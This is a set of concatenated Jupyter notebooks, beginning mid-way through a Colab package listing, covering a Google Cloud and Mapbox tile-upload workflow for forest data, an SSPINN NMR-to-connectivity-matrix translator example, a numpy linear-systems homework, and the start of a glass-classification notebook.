3.6.4 gensim 3.6.0 geographiclib 1.50 geopy 1.17.0 gin-config 0.3.0 glob2 0.7 google 2.0.3 google-api-core 1.16.0 google-api-python-client 1.7.12 google-auth 1.7.2 google-auth-httplib2 0.0.3 google-auth-oauthlib 0.4.1 google-cloud-bigquery 1.21.0 google-cloud-core 1.0.3 google-cloud-datastore 1.8.0 google-cloud-firestore 1.6.2 google-cloud-language 1.2.0 google-cloud-storage 1.18.1 google-cloud-translate 1.5.0 google-colab 1.0.0 google-pasta 0.2.0 google-resumable-media 0.4.1 googleapis-common-protos 1.51.0 googledrivedownloader 0.4 graphviz 0.10.1 grpcio 1.28.1 gspread 3.0.1 gspread-dataframe 3.0.5 gym 0.17.1 h5py 2.10.0 HeapDict 1.0.1 holidays 0.9.12 html5lib 1.0.1 httpimport 0.5.18 httplib2 0.17.2 httplib2shim 0.0.3 humanize 0.5.1 hyperopt 0.1.2 ideep4py 2.0.0.post3 idna 2.8 image 1.5.30 imageio 2.4.1 imagesize 1.2.0 
imbalanced-learn 0.4.3 imblearn 0.0 imgaug 0.2.9 importlib-metadata 1.6.0 imutils 0.5.3 inflect 2.1.0 intel-openmp 2020.0.133 intervaltree 2.1.0 ipykernel 4.10.1 ipython 5.5.0 ipython-genutils 0.2.0 ipython-sql 0.3.9 ipywidgets 7.5.1 iso3166 1.0.1 itsdangerous 1.1.0 jax 0.1.62 jaxlib 0.1.42 jdcal 1.4.1 jedi 0.17.0 jieba 0.42.1 Jinja2 2.11.2 jmespath 0.9.5 joblib 0.14.1 jpeg4py 0.1.4 jsonschema 2.6.0 jupyter 1.0.0 jupyter-client 5.3.4 jupyter-console 5.2.0 jupyter-core 4.6.3 kaggle 1.5.6 kapre 0.1.3.1 Keras 2.3.1 Keras-Applications 1.0.8 Keras-Preprocessing 1.1.0 keras-vis 0.4.1 kiwisolver 1.2.0 knnimpute 0.1.0 librosa 0.6.3 lightgbm 2.2.3 llvmlite 0.31.0 lmdb 0.98 lucid 0.3.8 LunarCalendar 0.0.9 lxml 4.2.6 mapbox 0.18.0 Markdown 3.2.1 MarkupSafe 1.1.1 matplotlib 3.2.1 matplotlib-venn 0.11.5 missingno 0.4.2 mistune 0.8.4 mizani 0.6.0 mkl 2019.0 mlxtend 0.14.0 more-itertools 8.2.0 moviepy 0.2.3.5 mpmath 1.1.0 msgpack 1.0.0 multiprocess 0.70.9 multitasking 0.0.9 murmurhash 1.0.2 music21 5.5.0 natsort 5.5.0 nbconvert 5.6.1 nbformat 5.0.5 networkx 2.4 nibabel 3.0.2 nltk 3.2.5 notebook 5.2.2 np-utils 0.5.12.1 numba 0.48.0 numexpr 2.7.1 numpy 1.18.2 nvidia-ml-py3 7.352.0 oauth2client 4.1.3 oauthlib 3.1.0 okgrade 0.4.3 opencv-contrib-python 4.1.2.30 opencv-python 4.1.2.30 openpyxl 2.5.9 opt-einsum 3.2.0 osqp 0.6.1 packaging 20.3 palettable 3.3.0 pandas 1.0.3 pandas-datareader 0.8.1 pandas-gbq 0.11.0 pandas-profiling 1.4.1 pandocfilters 1.4.2 parso 0.7.0 pathlib 1.0.1 patsy 0.5.1 pexpect 4.8.0 pickleshare 0.7.5 Pillow 7.0.0 pip 19.3.1 pip-tools 4.5.1 plac 1.1.3 plotly 4.4.1 plotnine 0.6.0 pluggy 0.7.1 polyline 1.4.0 portpicker 1.3.1 prefetch-generator 1.0.1 preshed 3.0.2 prettytable 0.7.2 progressbar2 3.38.0 prometheus-client 0.7.1 promise 2.3 prompt-toolkit 1.0.18 protobuf 3.10.0 psutil 5.4.8 psycopg2 2.7.6.1 ptvsd 5.0.0a12 ptyprocess 0.6.0 py 1.8.1 pyarrow 0.14.1 pyasn1 0.4.8 pyasn1-modules 0.2.8 pycocotools 2.0.0 pycparser 2.20 pydata-google-auth 0.3.0 pydot 1.3.0 pydot-ng 2.0.0 pydotplus 2.0.2 PyDrive 1.3.1 pyemd 0.5.1 pyglet 1.5.0 Pygments 2.1.3 pygobject 3.26.1 pymc3 3.7 PyMeeus 0.3.7 pymongo 3.10.1 pymystem3 0.2.0 PyOpenGL 3.1.5 pyparsing 2.4.7 pyrsistent 0.16.0 pysndfile 1.3.8 PySocks 1.7.1 pystan 2.19.1.1 pytest 3.6.4 python-apt 1.6.5+ubuntu0.2 python-chess 0.23.11 python-dateutil 2.8.1 python-louvain 0.14 python-slugify 4.0.0 python-utils 2.4.0 pytz 2018.9 PyWavelets 1.1.1 PyYAML 3.13 pyzmq 19.0.0 qtconsole 4.7.2 QtPy 1.9.0 regex 2019.12.20 requests 2.21.0 requests-oauthlib 1.3.0 resampy 0.2.2 retrying 1.3.3 roman 2.0.0 rpy2 3.2.7 rsa 4.0 s3fs 0.4.2 s3transfer 0.3.3 scikit-image 0.16.2 scikit-learn 0.22.2.post1 scipy 1.4.1 screen-resolution-extra 0.0.0 scs 2.1.2 seaborn 0.10.0 Send2Trash 1.5.0 setuptools 46.1.3 setuptools-git 1.2 Shapely 1.7.0 simplegeneric 0.8.1 six 1.12.0 sklearn 0.0 sklearn-pandas 1.8.0 smart-open 1.11.1 snowballstemmer 2.0.0 sortedcontainers 2.1.0 spacy 2.2.4 Sphinx 1.8.5 sphinxcontrib-websupport 1.2.1 SQLAlchemy 1.3.16 sqlparse 0.3.1 srsly 1.0.2 statsmodels 0.10.2 sympy 1.1.1 tables 3.4.4 tabulate 0.8.7 tbb 2020.0.133 tblib 1.6.0 tensorboard 2.2.0 tensorboard-plugin-wit 1.6.0.post3 tensorboardcolab 0.0.22 tensorflow 2.2.0rc3 tensorflow-addons 0.8.3 tensorflow-datasets 2.1.0 tensorflow-estimator 2.2.0rc0 tensorflow-gcs-config 2.1.8 tensorflow-hub 0.8.0 tensorflow-metadata 0.21.2 tensorflow-privacy 0.2.2 tensorflow-probability 0.9.0 termcolor 1.1.0 terminado 0.8.3 testpath 0.4.4 text-unidecode 1.3 textblob 0.15.3 textgenrnn 1.4.1 Theano 1.0.4 thinc 7.4.0 toolz 0.10.0 
torch 1.4.0 torchsummary 1.5.1 torchtext 0.3.1 torchvision 0.5.0 tornado 4.5.3 tqdm 4.38.0 traitlets 4.3.3 tweepy 3.6.0 typeguard 2.7.1 typing 3.6.6 typing-extensions 3.6.6 tzlocal 1.5.1 umap-learn 0.4.1 uritemplate 3.0.1 urllib3 1.24.3 vega-datasets 0.8.0 wasabi 0.6.0 wcwidth 0.1.9 webencodings 0.5.1 Werkzeug 1.0.1 wheel 0.34.2 widgetsnbextension 3.5.1 wordcloud 1.5.0 wrapt 1.12.1 xarray 0.15.1 xgboost 0.90 xkit 0.0.0 xlrd 1.1.0 xlwt 1.3.0 yellowbrick 0.9.1 zict 2.0.0 zipp 3.1.0 ###Markdown Authorisation Google cloud storageEither use user authorisation or a service account, save credentials to your drive or upload. ###Code # For auth WITHOUT service account #from google.colab import auth #auth.authenticate_user() # https://cloud.google.com/resource-manager/docs/creating-managing-projects #project_id = "soc-platform" #!gcloud config set project {project_id} # Mount drive from google.colab import drive drive.mount('/content/drive') # Copy GC credentials to home (place in your GDrive, and connect Drive) !cp "/content/drive/My Drive/soc-platform-6a9bf204638c.json" "/root/.soc-platform-6a9bf204638c.json" # Auth WITH service account !gcloud auth activate-service-account \ [email protected] \ --key-file=/root/.soc-platform-6a9bf204638c.json --project="soc-platform" # Test GC auth !gsutil ls "gs://vizz-data-transfer" ###Output gs://vizz-data-transfer/SOC_maps/ ###Markdown MapBoxCreate a JSON file and add it to your drive or upload:```{"MB_USER": "user-name", "MB_TOKEN": "token"}``` ###Code # Copy GC credentials to home (place in your GDrive, and connect Drive) !cp "/content/drive/My Drive/copernicus-forests-mapbox.json" "/root/.copernicus-forests-mapbox.json" # Set up Mapbox (S3) credentials as environmental variables import json import os # Set user and token as environment variables c = json.loads(open("/root/.copernicus-forests-mapbox.json").read()) os.environ['MB_USER'] = c['MB_USER'] os.environ['MB_TOKEN'] = c['MB_TOKEN'] # Make call to mapbox api and save return to file !curl -X POST https://api.mapbox.com/uploads/v1/${MB_USER}/credentials?access_token=${MB_TOKEN} > credentials.json r = json.loads(open("credentials.json").read()) #print(r) # Set credentials as environ variables os.environ['MB_BUCKET'] = r['bucket'] os.environ['MB_KEY'] = r['key'] os.environ['AWS_ACCESS_KEY_ID'] = r['accessKeyId'] os.environ['AWS_SECRET_ACCESS_KEY'] = r['secretAccessKey'] os.environ['AWS_SESSION_TOKEN'] = r['sessionToken'] ###Output % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 857 100 857 0 0 2158 0 --:--:-- --:--:-- --:--:-- 2158 ###Markdown Utils copy_gcs ###Code import os import subprocess def copy_gcs(source_list, dest_list, opts=""): """ Use gsutil to copy each corresponding item in source_list to dest_list """ for s, d in zip(source_list, dest_list): cmd = f"gsutil -m cp -r {opts} {s} {d}" print(f"Processing: {cmd}") r = subprocess.call(cmd, shell=True) if r == 0: print("Task created") else: print("Task failed") print("Finished copy") ###Output _____no_output_____ ###Markdown upload_to_mapbox ###Code # Upload task for mapbox import os from mapbox import Uploader def upload_to_mapbox(file_path, tileset_name): """ Given a local file path and a MapBox tileset name push to MapBox AWS S3 staging and create MapBox upload task """ username = os.getenv("MB_USER") my_token = os.getenv("MB_TOKEN") u = Uploader(access_token=my_token) # handles authentication tileset = f"{username}.{tileset_name}" # name your tileset job = u.upload(open(file_path, 'rb'), 
tileset) # upload happens here # job = u.create(url, tileset, name=tileset_name) # starts the tiling job status = job.status_code print(status) ###Output _____no_output_____ ###Markdown create_mbtiles ###Code import os import subprocess def create_mbtiles(source_path, dest_path, layer_name, opts="-zg --drop-densest-as-needed --extend-zooms-if-still-dropping --force --read-parallel"): """ Use tippecanoe to to create a MBTILE at dest_path from source_path. layer_name is used for the name of the layer in the MBTILE. Regex file path (/*.geojson) is supported for source_path. """ cmd = f"tippecanoe -o {dest_path} -l {layer_name} {opts} {source_path}" print(f"Processing: {cmd}") r = subprocess.call(cmd, shell=True) if r == 0: print("Task created") else: print("Task failed") print("Finished processing") ###Output _____no_output_____ ###Markdown Process data Create MBTILES ###Code layer_name = "SWE_biovar_species" source_path = "'/content/drive/My Drive/copernicus-forests/SWE_zonal_biovar_ISEA-3-HEXAGON_grid.geojson'" dest_path = "'/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles'" create_mbtiles(source_path, dest_path, layer_name, opts="-zg --drop-densest-as-needed --extend-zooms-if-still-dropping --force --read-parallel") ###Output Processing: tippecanoe -o '/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles' -l SWE_biovar_species -zg --drop-densest-as-needed --extend-zooms-if-still-dropping --force --read-parallel '/content/drive/My Drive/copernicus-forests/SWE_zonal_biovar_ISEA-3-HEXAGON_grid.geojson' Task created Finished processing ###Markdown Upload to MapBox ###Code # Add to Mapbox import glob import os path = '/content/drive/My Drive/copernicus-forests/' files = [f for f in glob.glob(path + "**/*.mbtiles", recursive=True)] print(files) for f in files: print(f) upload_to_mapbox(f, os.path.splitext(os.path.basename(f))[0]) ###Output ['/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles'] /content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles 201
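###Markdown The upload call returns as soon as MapBox accepts the file (the 201 above); the actual tiling runs asynchronously. Recent upload statuses can be polled through the MapBox Uploads API — a sketch reusing the credentials already set in the environment (this endpoint lists recent uploads for the account): ###Code # List recent MapBox upload statuses (tiling progress, errors, completion) !curl "https://api.mapbox.com/uploads/v1/${MB_USER}?access_token=${MB_TOKEN}" ###Output _____no_output_____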
examples/TranslatorExample.ipynb
###Markdown SSPINN Neural Net Translator Let's take a look at our nn_translator function. This function takes the input file and parses it to get a tuple containing:1. a list of elements of size 10 concatonated with a list of peak areas and multiplicities of size 3,3402. a connectivity matrix of size 432 by 432So first we will import the nn_translator from sspinn. We also import os so that we can look at the input files: ###Code from sspinn.nn_translator import nn_translator as nnt import os ###Output _____no_output_____ ###Markdown This is what the input file for C15O2H22 would look like for a training file: ###Code fo = open('nn_translator_test.txt', 'r') line = fo.readline() print(line) while line != '': line = fo.readline() print(line) ###Output Empirical formula: C15O2H22 peakLocation peakArea peakMultiplicity 9.1 1 Q 10.9 1 Q 24.2 1 Q 26.6 1 q 27.4 1 T 33.0 1 t 39.0 1 T 44.1 1 S 46.2 1 D 72.7 1 d 121.6 1 D 125.6 1 S 138.1 1 s 165.9 1 s 200.1 1 S Connectivity Matrix C C C C C C C C C C C C C C C O O H H H H H H H H H H H H H H H H H H H H H H 0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 1 0 0 0 0 0 0 0 1 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 2 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 1 0 1 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 1 0 0 0 0 0 0 0 0 1 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 2 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ###Markdown The input file starts out with the empirical formula, followed by a list of the peak location, peak area, and peak multiplicity. Since we are using C-NMR, all of the peak areas should be set to 1. If the input file is not a training file, then it will end after this list. If the input file is a training file, then it will also include a connectivity matrix at the end. To run the file through the nn_traslator we use the following function which take 2 arguments:1. The path to the input file (string)2. Whether or not this is a training file (boolean default=True) ###Code output = nnt('nn_translator_test.txt', True) ###Output _____no_output_____ ###Markdown This function will output a tuple with two elements. We check the size of each element and make sure they are the expected sizes (3350 and 432 by 432): ###Code len(output[0]) print(len(output[1]), 'by', len(output[1][0])) ###Output 432 by 432 ###Markdown The elements are included in the first 11 elements of `input[0]`: ###Code output[0][0:10] ###Output _____no_output_____ ###Markdown The rest of `input[0]` contains the multiplicities of peaks at locations that correspond with their index number (there is not a peak at 9.0 there will be a zero at `index = 90+11`, but there quartet at 9.1, so we will see a 4 at `index = 91+11` ): ###Code output[0][90+11:110] ###Output _____no_output_____ ###Markdown The elements of the connectivity matrix that is included in the input file are expanded into a conectivity matrix of size 432 by 432 where the first 182 rows represent the connections to hydrogens, the next 144 rows contain the carbon connections, and so on with N, O, S, F, Cl, Br, P, I, and B.Since hydrogen cannot bond with hydrogen, if we look at the first row, we will see that the first 22 elements (looking just at the columns related to the number of hydrogens in our system, for the sake of looking at a reasonably sized matrix) will be zero: ###Code for i in range(0,22): print(output[1][i][0:22]) ###Output [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] ###Markdown We can look at the carbon hydrogen bonds by looking at the block for elements (i,j) where i runs from 0 to 22 and j runs from 183 to 198: ###Code for i in range(0,22): print(output[1][i][183:198]) ###Output [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0] [0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] ###Markdown However, if we look at the carbon carbon block (for the first 15 carbons, since those are the ones involved in bonding) we will see single and double bonds: ###Code for i in range(183, 198): print(output[1][i][183:198]) ###Output [0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0] [1, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 0, 0] [0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0] [0, 0, 0, 2, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 2, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 0, 0, 0, 0, 1] [0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0] ###Markdown We can also see the relevent carbon oxygen bonds in the following block: ###Code for i in range(346, 348): print(output[1][i][183:198]) ###Output [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] [0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
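###Markdown A quick sanity check on the translator output: bonds are undirected, so the full 432 by 432 matrix should be symmetric. A sketch using numpy on the `output` tuple from above: ###Code import numpy as np conn = np.array(output[1]) print(conn.shape) # expected: (432, 432) print((conn == conn.T).all()) # symmetry check: True if every bond is mirrored ###Output _____no_output_____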
Tareas/Tarea #1.3_06 febrero.ipynb
###Markdown Industrial Robotics--Alejandro Rojas Barba Due date: February 11, 2019Homework 3 Exercise 1--Mrs. Mercedes went to the market and was offered the following deals: a package of 3 bars of soap, 2 tubes of toothpaste, and 4 toothbrushes for 206; a second package of 5 bars of soap, 3 tubes of toothpaste, and 2 toothbrushes for 210; and a third package containing 6 units of each of the previous items for 412. What is the cost of each item? ###Code import numpy as np A=np.array([ [3,2,4], [5,3,2], [6,6,6] ]) B=np.array([ [206], [210], [412] ]) C=np.linalg.inv(A)@B print("Soap:",float(C[0])) print("Toothpaste:",float(C[1])) print("Toothbrushes:",float(C[2])) ###Output Soap: 15.333333333333357 Toothpaste: 26.666666666666657 Toothbrushes: 26.66666666666667 ###Markdown Exercise 2--Mrs. Juana buys 3 kg of beans, 2 kg of salt, and 1 kg of rice for 130. Mrs. Petra buys 2 kg of beans, 1 kg of salt, and 1 kg of rice, paying a total of 90. Another lady buys 1 kg of beans, 1 kg of salt, and 1 kg of rice, paying a total of 60. If the three ladies shopped at the same store, what is the price per kg of each product? ###Code A=np.array([ [3,2,1], [2,1,1], [1,1,1] ]) B=np.array([ [130], [90], [60] ]) C=np.linalg.inv(A)@B print("Beans:",int(C[0])) print("Salt:",int(C[1])) print("Rice:",int(C[2])) ###Output Beans: 30 Salt: 10 Rice: 20
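###Markdown A side note: rather than forming the inverse explicitly, `np.linalg.solve` is the usual way to solve these systems — it is more accurate and cheaper for larger matrices. A sketch reusing the arrays from Exercise 2: ###Code # solves A @ C = B directly, without computing the inverse of A C = np.linalg.solve(A, B) print(C.ravel()) # expected: [30. 10. 20.] ###Output _____no_output_____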
Neural Networks/Glass.ipynb
###Markdown ###Code import tensorflow as tf import pandas as pd import numpy as np import seaborn as sns import matplotlib.pyplot as plt %matplotlib inline print(f'Tensorflow version: {tf.__version__}') glass_data = pd.read_csv('/content/drive/My Drive/Colab Notebooks/glass.csv', parse_dates=True, encoding = "cp1252") glass_data.head() glass_data.groupby('Type').count().reset_index() # remap labels 1-7 to the contiguous range 0-6 expected by sparse_categorical_crossentropy glass_data['Type'].replace(to_replace={1: 0, 2: 1, 3: 2, 4: 3, 5: 4, 6: 5, 7: 6}, inplace=True) corr = glass_data.corr(method = "pearson") # corr = glass_data.corr(method = "spearman") # corr = glass_data.corr(method = "kendall") f, ax = plt.subplots(figsize=(10, 10)) sns.heatmap(corr, mask=np.zeros_like(corr, dtype=np.bool), cmap=sns.diverging_palette(220, 10, as_cmap=True), square=True, ax=ax, annot=True) X = glass_data[['RI','Na','Mg','Al','Si','K','Ca','Ba','Fe']] y = glass_data['Type'] from sklearn.model_selection import train_test_split 